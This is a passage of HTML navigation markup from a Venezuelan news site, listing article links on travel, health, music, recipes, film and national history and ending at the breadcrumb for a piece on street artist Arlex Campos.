                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/rio-masparro-en-barinas/" rel="bookmark" title="¿Conoces el Río Masparro en Barinas?">¿Conoces el Río Masparro en Barinas?</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/pico-pan-de-azucar/" rel="bookmark" title="Pico Pan de Azúcar"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/06/pan-de-azucar-Mérida-198x143.jpg" alt="Pico Pan de Azúcar" title="Pico Pan de Azúcar"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/pico-pan-de-azucar/" rel="bookmark" title="Pico Pan de Azúcar">Pico Pan de Azúcar</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/volar-en-parapente-por-galipan/" rel="bookmark" title="Volar en Parapente por Galipán"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/06/parapente-198x143.jpg" alt="Volar en Parapente por Galipán" title="Volar en Parapente por Galipán"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/volar-en-parapente-por-galipan/" rel="bookmark" title="Volar en Parapente por Galipán">Volar en Parapente por Galipán</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_59923569d65f0" data-td_block_id="td_uid_5_59923569d65f0"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_59923569d65f0" data-td_block_id="td_uid_5_59923569d65f0"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-mega-menu menu-item-334"><a href="http://www.noticias.com.ve/salud/">Salud</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_7_59923569dbd58 = new td_block();
block_td_uid_7_59923569dbd58.id = "td_uid_7_59923569dbd58";
block_td_uid_7_59923569dbd58.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"2","show_child_cat":"5"}';
block_td_uid_7_59923569dbd58.td_cur_cat = "2";
block_td_uid_7_59923569dbd58.td_column_number = "1";
block_td_uid_7_59923569dbd58.block_type = "td_mega_menu";
block_td_uid_7_59923569dbd58.post_count = "5";
block_td_uid_7_59923569dbd58.found_posts = "121";
block_td_uid_7_59923569dbd58.max_num_pages = "25";
block_td_uid_7_59923569dbd58.header_color = "";
block_td_uid_7_59923569dbd58.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_7_59923569dbd58);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_7_59923569dbd58 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/influye-nuestra-percepcion-cuando-hacemos-ejercicio/" rel="bookmark" title="¿Influye nuestra percepción cuando hacemos ejercicio?"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/ejercico-198x143.jpg" alt="Nuestra percepción influye en los beneficios de hacer ejercicio" title="¿Influye nuestra percepción cuando hacemos ejercicio?"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/influye-nuestra-percepcion-cuando-hacemos-ejercicio/" rel="bookmark" title="¿Influye nuestra percepción cuando hacemos ejercicio?">¿Influye nuestra percepción cuando hacemos ejercicio?</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/5-aceites-naturales-esenciales-para-tu-cuidado-diario/" rel="bookmark" title="5 aceites naturales esenciales para tu cuidado diario"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/aceite_almedras-198x143.jpg" alt="" title="5 aceites naturales esenciales para tu cuidado diario"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/5-aceites-naturales-esenciales-para-tu-cuidado-diario/" rel="bookmark" title="5 aceites naturales esenciales para tu cuidado diario">5 aceites naturales esenciales para tu cuidado diario</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/funciona-realmente-una-vacuna-contra-el-cancer/" rel="bookmark" title="¿Funciona realmente una vacuna contra el cáncer?"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/vacuna_cancer-198x143.jpg" alt="" title="¿Funciona realmente una vacuna contra el cáncer?"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/funciona-realmente-una-vacuna-contra-el-cancer/" rel="bookmark" title="¿Funciona realmente una vacuna contra el cáncer?">¿Funciona realmente una vacuna contra el cáncer?</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/cual-es-la-peor-red-social-para-la-salud-mental/" rel="bookmark" title="¿Cuál es la peor red social para la salud mental?"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/s-198x143.jpg" alt="la peor red social para la salud mental" title="¿Cuál es la peor red social para la salud mental?"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/cual-es-la-peor-red-social-para-la-salud-mental/" rel="bookmark" title="¿Cuál es la peor red social para la salud mental?">¿Cuál es la peor red social para la salud mental?</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/es-posible-llevar-una-dieta-libre-de-gluten-en-venezuela/" rel="bookmark" title="¿Es posible llevar una dieta libre de gluten en Venezuela?"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/05/GLUTEN-198x143.jpg" alt="dieta libre de gluten en Venezuela" title="¿Es posible llevar una dieta libre de gluten en Venezuela?"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/es-posible-llevar-una-dieta-libre-de-gluten-en-venezuela/" rel="bookmark" title="¿Es posible llevar una dieta libre de gluten en Venezuela?">¿Es posible llevar una dieta libre de gluten en Venezuela?</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_7_59923569dbd58" data-td_block_id="td_uid_7_59923569dbd58"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_7_59923569dbd58" data-td_block_id="td_uid_7_59923569dbd58"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-mega-menu menu-item-323"><a href="http://www.noticias.com.ve/musica/">Música</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_9_59923569e2e8a = new td_block();
block_td_uid_9_59923569e2e8a.id = "td_uid_9_59923569e2e8a";
block_td_uid_9_59923569e2e8a.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"1","show_child_cat":"5"}';
block_td_uid_9_59923569e2e8a.td_cur_cat = "1";
block_td_uid_9_59923569e2e8a.td_column_number = "1";
block_td_uid_9_59923569e2e8a.block_type = "td_mega_menu";
block_td_uid_9_59923569e2e8a.post_count = "5";
block_td_uid_9_59923569e2e8a.found_posts = "354";
block_td_uid_9_59923569e2e8a.max_num_pages = "71";
block_td_uid_9_59923569e2e8a.header_color = "";
block_td_uid_9_59923569e2e8a.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_9_59923569e2e8a);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_9_59923569e2e8a class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/musicadarte-continua-alzando-voz-benefico-la-fundacion-unos-chamos-ahi/" rel="bookmark" title="MúsicaDARTE alza su voz a beneficio de la Fundación Unos Chamos Ahí"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/concierto-198x143.jpg" alt="" title="MúsicaDARTE alza su voz a beneficio de la Fundación Unos Chamos Ahí"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/musicadarte-continua-alzando-voz-benefico-la-fundacion-unos-chamos-ahi/" rel="bookmark" title="MúsicaDARTE alza su voz a beneficio de la Fundación Unos Chamos Ahí">MúsicaDARTE alza su voz a beneficio de la Fundación Unos Chamos Ahí</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/concierto-ladosis-47-beneficio-del-maestro-gerry-weil/" rel="bookmark" title="Concierto LaDosis #47 A beneficio del maestro Gerry Weil"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/Concierto-Ladosis-47b-e1502718915201-198x143.jpg" alt="" title="Concierto LaDosis #47 A beneficio del maestro Gerry Weil"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/concierto-ladosis-47-beneficio-del-maestro-gerry-weil/" rel="bookmark" title="Concierto LaDosis #47 A beneficio del maestro Gerry Weil">Concierto LaDosis #47 A beneficio del maestro Gerry Weil</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/que-seria-de-la-musica-venezolana-sin-simon-diaz/" rel="bookmark" title="Simón Díaz: legado musical que aún inspira"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2016/02/s-198x143.jpg" alt="Simón Díaz" title="Simón Díaz: legado musical que aún inspira"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/que-seria-de-la-musica-venezolana-sin-simon-diaz/" rel="bookmark" title="Simón Díaz: legado musical que aún inspira">Simón Díaz: legado musical que aún inspira</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/una-joya-del-jazz-que-adopto-a-venezuela/" rel="bookmark" title="Gerry Weil: una joya del jazz que adoptó a Venezuela como hogar"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/gerry_weil-198x143.jpg" alt="Gerry Weil" title="Gerry Weil: una joya del jazz que adoptó a Venezuela como hogar"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/una-joya-del-jazz-que-adopto-a-venezuela/" rel="bookmark" title="Gerry Weil: una joya del jazz que adoptó a Venezuela como hogar">Gerry Weil: una joya del jazz que adoptó a Venezuela como hogar</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/450-anos-diez-razones-no-dejar-amar-caracas/" rel="bookmark" title="450 años y diez razones para no dejar de amar a Caracas"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/450_caracas-198x143.jpg" alt="diez razones para no dejar de amar a Caracas" title="450 años y diez razones para no dejar de amar a Caracas"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/450-anos-diez-razones-no-dejar-amar-caracas/" rel="bookmark" title="450 años y diez razones para no dejar de amar a Caracas">450 años y diez razones para no dejar de amar a Caracas</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_9_59923569e2e8a" data-td_block_id="td_uid_9_59923569e2e8a"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_9_59923569e2e8a" data-td_block_id="td_uid_9_59923569e2e8a"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-mega-menu menu-item-343"><a href="http://www.noticias.com.ve/recetas/">Recetas</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_11_59923569e87e0 = new td_block();
block_td_uid_11_59923569e87e0.id = "td_uid_11_59923569e87e0";
block_td_uid_11_59923569e87e0.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"13","show_child_cat":"5"}';
block_td_uid_11_59923569e87e0.td_cur_cat = "13";
block_td_uid_11_59923569e87e0.td_column_number = "1";
block_td_uid_11_59923569e87e0.block_type = "td_mega_menu";
block_td_uid_11_59923569e87e0.post_count = "5";
block_td_uid_11_59923569e87e0.found_posts = "122";
block_td_uid_11_59923569e87e0.max_num_pages = "25";
block_td_uid_11_59923569e87e0.header_color = "";
block_td_uid_11_59923569e87e0.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_11_59923569e87e0);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_11_59923569e87e0 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/torta-de-platano-venezolana/" rel="bookmark" title="Torta de Plátano Venezolana"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/torta-de-plátano-198x143.jpg" alt="Torta de Plátano Venezolana" title="Torta de Plátano Venezolana"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/torta-de-platano-venezolana/" rel="bookmark" title="Torta de Plátano Venezolana">Torta de Plátano Venezolana</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/6-tesoros-de-la-gastronomia-venezolana/" rel="bookmark" title="6 tesoros de la gastronomía venezolana"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/arepas-198x143.jpg" alt="" title="6 tesoros de la gastronomía venezolana"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/6-tesoros-de-la-gastronomia-venezolana/" rel="bookmark" title="6 tesoros de la gastronomía venezolana">6 tesoros de la gastronomía venezolana</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/top-5-de-los-mejores-rellenos-de-patacon/" rel="bookmark" title="Top 5 de los mejores rellenos de patacón"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/pa_patacones_t670x470-198x143.jpg" alt="" title="Top 5 de los mejores rellenos de patacón"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/top-5-de-los-mejores-rellenos-de-patacon/" rel="bookmark" title="Top 5 de los mejores rellenos de patacón">Top 5 de los mejores rellenos de patacón</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/3-desayunos-andinos-para-arrancar-el-dia/" rel="bookmark" title="3 desayunos andinos para arrancar el día"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/desa_-2-198x143.jpg" alt="" title="3 desayunos andinos para arrancar el día"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/3-desayunos-andinos-para-arrancar-el-dia/" rel="bookmark" title="3 desayunos andinos para arrancar el día">3 desayunos andinos para arrancar el día</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/sopa-picado-llanero/" rel="bookmark" title="Sopa de Picado Llanero"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/06/picadillo_llanero-198x143.jpg" alt="" title="Sopa de Picado Llanero"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/sopa-picado-llanero/" rel="bookmark" title="Sopa de Picado Llanero">Sopa de Picado Llanero</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_11_59923569e87e0" data-td_block_id="td_uid_11_59923569e87e0"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_11_59923569e87e0" data-td_block_id="td_uid_11_59923569e87e0"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-mega-menu menu-item-330"><a href="http://www.noticias.com.ve/cine/">Cine</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_13_59923569efb49 = new td_block();
block_td_uid_13_59923569efb49.id = "td_uid_13_59923569efb49";
block_td_uid_13_59923569efb49.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"14","show_child_cat":"5"}';
block_td_uid_13_59923569efb49.td_cur_cat = "14";
block_td_uid_13_59923569efb49.td_column_number = "1";
block_td_uid_13_59923569efb49.block_type = "td_mega_menu";
block_td_uid_13_59923569efb49.post_count = "5";
block_td_uid_13_59923569efb49.found_posts = "199";
block_td_uid_13_59923569efb49.max_num_pages = "40";
block_td_uid_13_59923569efb49.header_color = "";
block_td_uid_13_59923569efb49.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_13_59923569efb49);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_13_59923569efb49 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/el-avila-tres-generaciones-cortometraje/" rel="bookmark" title="El Ávila Tres Generaciones: un cortometraje desde lo alto"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/el_avila_3generaciones-198x143.jpg" alt="El Ávila Tres Generaciones" title="El Ávila Tres Generaciones: un cortometraje desde lo alto"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/el-avila-tres-generaciones-cortometraje/" rel="bookmark" title="El Ávila Tres Generaciones: un cortometraje desde lo alto">El Ávila Tres Generaciones: un cortometraje desde lo alto</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/7-razones-para-ver-dunkerque-de-chistopher-nolan/" rel="bookmark" title="7 razones para ver Dunkerque de Christopher Nolan"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/DUNKERQUE-christopher-nolan-1-198x143.jpg" alt="" title="7 razones para ver Dunkerque de Christopher Nolan"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/7-razones-para-ver-dunkerque-de-chistopher-nolan/" rel="bookmark" title="7 razones para ver Dunkerque de Christopher Nolan">7 razones para ver Dunkerque de Christopher Nolan</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/5-formas-de-divertirse-sin-salir-de-casa/" rel="bookmark" title="5 formas de divertirse sin salir de casa"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/08/WATPAD-198x143.jpg" alt="5 formas de divertirse sin salir de casa" title="5 formas de divertirse sin salir de casa"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/5-formas-de-divertirse-sin-salir-de-casa/" rel="bookmark" title="5 formas de divertirse sin salir de casa">5 formas de divertirse sin salir de casa</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/edgar-ramirez-protagoniza-bright-de-netflix/" rel="bookmark" title="Edgar Ramírez protagoniza Bright de Netflix"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/0c294bf5f2dd4d698fd09e7e8a639fa2-198x143.jpg" alt="Edgar Ramírez protagonizará Bright" title="Edgar Ramírez protagoniza Bright de Netflix"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/edgar-ramirez-protagoniza-bright-de-netflix/" rel="bookmark" title="Edgar Ramírez protagoniza Bright de Netflix">Edgar Ramírez protagoniza Bright de Netflix</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/extraterrestes-pelicula-venezolana/" rel="bookmark" title="Extra Terrestres una coproducción venezolana con tres dimensiones"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/extra-terrestres-198x143.jpg" alt="Extra TerrestreS" title="Extra Terrestres una coproducción venezolana con tres dimensiones"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/extraterrestes-pelicula-venezolana/" rel="bookmark" title="Extra Terrestres una coproducción venezolana con tres dimensiones">Extra Terrestres una coproducción venezolana con tres dimensiones</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_13_59923569efb49" data-td_block_id="td_uid_13_59923569efb49"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_13_59923569efb49" data-td_block_id="td_uid_13_59923569efb49"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-mega-menu menu-item-339"><a href="http://www.noticias.com.ve/internacionales/">Internacionales</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_15_5992356a026a9 = new td_block();
block_td_uid_15_5992356a026a9.id = "td_uid_15_5992356a026a9";
block_td_uid_15_5992356a026a9.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"16","show_child_cat":"5"}';
block_td_uid_15_5992356a026a9.td_cur_cat = "16";
block_td_uid_15_5992356a026a9.td_column_number = "1";
block_td_uid_15_5992356a026a9.block_type = "td_mega_menu";
block_td_uid_15_5992356a026a9.post_count = "5";
block_td_uid_15_5992356a026a9.found_posts = "286";
block_td_uid_15_5992356a026a9.max_num_pages = "58";
block_td_uid_15_5992356a026a9.header_color = "";
block_td_uid_15_5992356a026a9.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_15_5992356a026a9);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_15_5992356a026a9 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/234-anos-desde-nacimiento-del-libertador/" rel="bookmark" title="234 años desde el nacimiento del Libertador"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/bolivar-198x143.jpg" alt="234 años desde el nacimiento del Libertador" title="234 años desde el nacimiento del Libertador"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/234-anos-desde-nacimiento-del-libertador/" rel="bookmark" title="234 años desde el nacimiento del Libertador">234 años desde el nacimiento del Libertador</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/9921-2/" rel="bookmark" title="5 de Julio: Día de Independencia en Venezuela"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/07/5dejulio-198x143.jpg" alt="5 de Julio: Día de Independencia en Venezuela" title="5 de Julio: Día de Independencia en Venezuela"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/9921-2/" rel="bookmark" title="5 de Julio: Día de Independencia en Venezuela">5 de Julio: Día de Independencia en Venezuela</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/cinco-reflexiones-para-periodistas-en-su-dia/" rel="bookmark" title="Cinco reflexiones para periodistas en su día"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/06/Cinco-reflexiones-para-periodistas-en-su-día-198x143.jpg" alt="" title="Cinco reflexiones para periodistas en su día"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/cinco-reflexiones-para-periodistas-en-su-dia/" rel="bookmark" title="Cinco reflexiones para periodistas en su día">Cinco reflexiones para periodistas en su día</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/20-anos-de-harry-potter/" rel="bookmark" title="20 años de Harry Potter: &#8220;la novela que vivió&#8221; en toda una generación"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/06/harry_potter_a-198x143.jpg" alt="Harry Potter" title="20 años de Harry Potter: &#8220;la novela que vivió&#8221; en toda una generación"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/20-anos-de-harry-potter/" rel="bookmark" title="20 años de Harry Potter: &#8220;la novela que vivió&#8221; en toda una generación">20 años de Harry Potter: &#8220;la novela que vivió&#8221; en toda una generación</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://www.noticias.com.ve/dia-mundial-los-refugiados/" rel="bookmark" title="ACNUR: Existen 65.5 millones de refugiados en el mundo"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://www.noticias.com.ve/wp-content/uploads/2017/06/refugiados_dia-198x143.jpg" alt="" title="ACNUR: Existen 65.5 millones de refugiados en el mundo"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.noticias.com.ve/dia-mundial-los-refugiados/" rel="bookmark" title="ACNUR: Existen 65.5 millones de refugiados en el mundo">ACNUR: Existen 65.5 millones de refugiados en el mundo</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_15_5992356a026a9" data-td_block_id="td_uid_15_5992356a026a9"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_15_5992356a026a9" data-td_block_id="td_uid_15_5992356a026a9"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-no-down-arrow td-menu-item td-normal-menu menu-item-248"><a href="http://www.noticias.com.ve/contactanos/"><span class="menu_icon td-sp td-sp-ico-contact"></span><span class="menu_hidden">Contact</span></a></li>
</ul></div>                    </div>



                </div>

                <div class="span1" id="td-top-search">
                    <!-- Search -->
                    <div class="header-search-wrap">
                        <div class="dropdown header-search">
                            <a id="search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><span class="td-sp td-sp-ico-search"></span></a>
                            <div class="dropdown-menu" aria-labelledby="search-button">
                                <form role="search" method="get" class="td-search-form" action="http://www.noticias.com.ve/">
                                    <div class="td-head-form-search-wrap">
                                        <input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
                                    </div>
                                </form>
                                <div id="td-aj-search"></div>
                            </div>
                        </div>
                    </div>
                </div>


            </div> <!-- /.row-fluid -->
        </div> <!-- /.td-menu-wrap -->
    </div> <!-- /.td-menu-background -->
</div> <!-- /.td-menu-placeholder -->
        <div class="container td-page-wrap">
            <div class="row">
                <div class="span12">
                    <div class="td-grid-wrap">
                        <div class="container-fluid">
                            <div class="row-fluid ">
                        <div class="span8 column_container td-post-content" role="main" itemprop="mainContentOfPage">
                    <div class="entry-crumbs"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="" class="entry-crumb" itemprop="url" href="http://www.noticias.com.ve"><span itemprop="title">Home</span></a></span> <span class="td-sp td-sp-breadcrumb-arrow td-bread-sep"></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="Ver todos las entradas en Ingenio Venezolano" class="entry-crumb" itemprop="url" href="http://www.noticias.com.ve/category/ingeniovenezolano/"><span itemprop="title">Ingenio Venezolano</span></a></span> <span class="td-sp td-sp-breadcrumb-arrow td-bread-sep"></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content = "Arlex Campos: Street Art con sello venezolano">Arlex Campos: Street Art con sello venezolano</span></div>


